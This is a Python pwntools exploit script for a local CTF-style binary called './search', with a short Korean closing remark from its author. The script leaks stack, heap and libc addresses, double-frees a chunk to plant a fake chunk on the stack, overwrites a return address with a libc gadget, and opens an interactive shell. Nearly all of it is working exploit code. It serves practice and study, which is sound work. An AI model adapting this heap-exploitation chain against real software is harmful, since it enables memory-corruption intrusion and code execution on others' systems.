from pwn import *

from hexdump import *


import time


# Tube to the local target; every helper below talks through this global.
p = process("./search")


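def stack_leak():
    """Leak a stack address from the target's first two reads.

    Sends two 48-byte lines, waits for the second one to be echoed back and
    takes the 6 bytes that follow it as a little-endian pointer.  The log
    message calls this value "stack"; why the echo is followed by a pointer
    (an unterminated buffer, presumably) is inferred and should be confirmed
    against the binary.

    Returns:
        The raw leaked value.  Note the log line prints ``+ 32`` but the
        unadjusted leak is what is returned.
    """
    p.sendline("A" * 48)
    p.sendline("B" * 48)
    p.recvuntil("B" * 48)
    # recvn() blocks for exactly 6 bytes; recv(6) may return fewer if the
    # output arrives in pieces, and u64() would then fail on a short buffer.
    # A bytes literal keeps the padding valid under Python 2 and 3.
    stack_base = u64(p.recvn(6) + b"\x00\x00")
    log.info("stack: " + hex(stack_base + 32))
    return stack_base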


def index(data):
    """Menu option 2: add ``data`` as a new indexed entry.

    The entry length goes first, then (after a short pause, presumably so the
    two reads on the target do not merge) the entry itself.  Consumes output
    up to the next menu's "Quit" line.
    """
    for line in ("2", str(len(data))):
        p.sendline(line)
    time.sleep(0.1)
    p.sendline(data)
    p.recvuntil("Quit\n")


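def search(data, delete = False):
    """Menu option 1: search for ``data`` and answer every "Found" prompt.

    Each hit is answered with "y" (delete the entry) when ``delete`` is set,
    otherwise "n".  Deleting is what frees the entry's chunk, which the rest
    of the exploit relies on (inferred from how main()/pwn() use it).

    Giving up: a prompt is waited for with a 0.8 s timeout and, if nothing
    arrived, once more with 1.0 s (same patience as before).  Only when both
    attempts come back empty does the loop stop.

    Fix: the original compared the received data to ``""`` with ``is`` /
    ``is not``.  That only works because CPython interns the empty str; with
    bytes (Python 3 pwntools) ``is not b""`` is always true and the loop never
    ends.  It also never answered a prompt that arrived during the second
    wait, leaving the target blocked on input.
    """
    answer = "y" if delete else "n"
    p.sendline("1")
    p.sendline(str(len(data)))
    time.sleep(0.1)
    p.sendline(data)

    while True:
        found = p.recvuntil("Found", timeout = 0.8)
        if not found:
            found = p.recvuntil("Found", timeout = 1.0)
        if not found:
            break
        p.sendline(answer)

    p.recvuntil("Quit\n")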


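def heap_leak(data):
    """Search for ``data`` and read a heap pointer out of the first hit.

    Expects the target to answer ``Found 32: `` followed by the matching
    entry's bytes; the first 4 bytes are taken as the low half of a pointer.
    Presumably the matching entry is a freed chunk whose stored pointer gets
    printed back -- inferred, confirm against the binary.  The hit is not
    deleted ("n").

    Fix: the length sent is now derived from ``data`` instead of the
    hard-coded "6" (identical for the existing ``"\\0" * 6`` caller), and the
    4 bytes are read with recvn() so a short read cannot reach u64().

    Returns:
        The pointer with its low byte cleared (``& ~0xff``), logged as
        "heap base".  NOTE(review): that rounds to 0x100, not to a page;
        verify this is the intended granularity.
    """
    p.sendline("1")
    p.sendline(str(len(data)))
    p.sendline(data)

    p.recvuntil("Found 32: ")

    heaptr = u64(p.recvn(4) + b"\x00" * 4)
    heap_base = heaptr & ~0xff
    log.info("heap base: " + hex(heap_base))

    p.sendline("n")
    p.recvuntil("Quit\n")
    return heap_base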


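def libc_leak(data):
    """Search for ``data`` and read a libc pointer out of a 512-byte hit.

    Expects ``Found 512: `` followed by the entry's bytes and takes the first
    6 bytes as a little-endian pointer.  main() calls this right after
    deleting a 512-byte entry, so the freed chunk presumably carries libc
    (arena) pointers that the stale entry prints back -- inferred, confirm.
    Three "Found" prompts are declined; that count matches what main() has
    indexed by this point, so change it if the setup changes.

    Fixes: the local no longer shadows the function name, the 6 bytes are
    read with recvn() (recv() may return fewer), and the padding is a bytes
    literal so it concatenates with recvn()'s result under Python 3 too.

    Returns:
        The computed libc base.  The two subtracted constants are the
        author's offsets for this challenge's libc -- confirm with
        ``readelf``/gdb before reusing on another build.
    """
    p.sendline("1")
    p.sendline(str(len(data)))
    p.sendline(data)

    p.recvuntil("Found 512: ")

    leaked = u64(p.recvn(6) + b"\x00\x00")
    libc_base = leaked - 0x2047b8 - 0x1ba000
    log.info("libc base: " + hex(libc_base))

    p.sendline("n")
    p.sendline("n")
    p.sendline("n")

    p.recvuntil("Quit\n")
    return libc_base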


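def pwn(stack_base, libc_base):
    """Use the leaks to write attacker-controlled data onto the stack.

    Sequence (the chunk-level reasoning is inferred from the order of
    operations and should be confirmed with a debugger):
      1. index three entries sharing the word "some" and delete all three;
      2. search for four NUL bytes and delete the hit, which appears to free
         one of those chunks a second time;
      3. index an entry whose first 8 bytes are ``stack_base + 0x52`` --
         presumably a planted forward pointer so a later allocation is
         handed out on the stack;
      4. two more indexes to consume the intermediate chunks;
      5. the final index lands on the stack: 6 filler bytes, three copies of
         0x400896 and ``libc_base + 0x4647C``.  Both constants are
         target-specific (an address in ./search and an offset in its libc);
         confirm before reuse.

    Then hands the tube to the user.  Fix: the ``ljust`` fill and the
    suffixes concatenated with ``p64()`` output are bytes literals, so this
    works under Python 3 pwntools (where ``p64`` returns bytes) as well as
    Python 2, where ``b""`` and ``""`` are the same type.
    """
    index("A" * 51 + " some")
    index("B" * 51 + " some")
    index("C" * 51 + " some")
    search("some", delete = True)

    # Inline menu drive rather than search(): only the first prompt is to be
    # answered "y", the second "n".
    p.sendline("1")
    p.sendline("4")
    p.sendline("\0" * 4)
    p.sendline("y")
    p.sendline("n")
    p.recvuntil("Quit\n")

    index(p64(stack_base + 0x52).ljust(50, b"\0") + b" pwned")

    # " pwend" is kept as in the original; whether the misspelling is
    # intentional (so it does not match a later "pwned" search) is unclear.
    index("D" * 50 + " pwend")
    index("E" * 50 + " pwned")

    ret_target = p64(0x400896)  # address inside ./search -- confirm
    libc_target = p64(libc_base + 0x4647C)  # libc offset for this build -- confirm
    index(b"W" * 6 + ret_target * 3 + libc_target.ljust(56, b"G"))

    #p.sendline("3")
    p.interactive()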


def main() -> None:
    """Drive the exploit: leak the stack, groom the heap, leak libc, then pwn."""
    stack_base = stack_leak()

    # Two entries sharing "plays" plus a 32-byte filler; deleting the "plays"
    # hits frees their chunks.  The exact layout this produces is inferred --
    # confirm with a debugger.
    index("A" * 25 + " plays")
    index("B" * 25 + " plays")
    index("C" * 32)

    search("plays", delete = True)

    #heap_base = heap_leak("\0" * 6)

    # A 512-byte entry: once freed, its chunk presumably holds libc (arena)
    # pointers that the following search prints back via the stale entry.
    index(("A" * 256 + " pwning ").ljust(512, "B"))

    search("pwning", delete = True)

    libc_base = libc_leak("\0" * 6)

    pwn(stack_base, libc_base)


# Script entry point; nothing runs on import.
if __name__ =='__main__':
    main()


문제 진짜 잘 만든거 같다. 


fake chunk 만드는 거 잘 안되서 와업 보고 풀었는데 내일 이거 다시 짜봐야겠다. 흠....
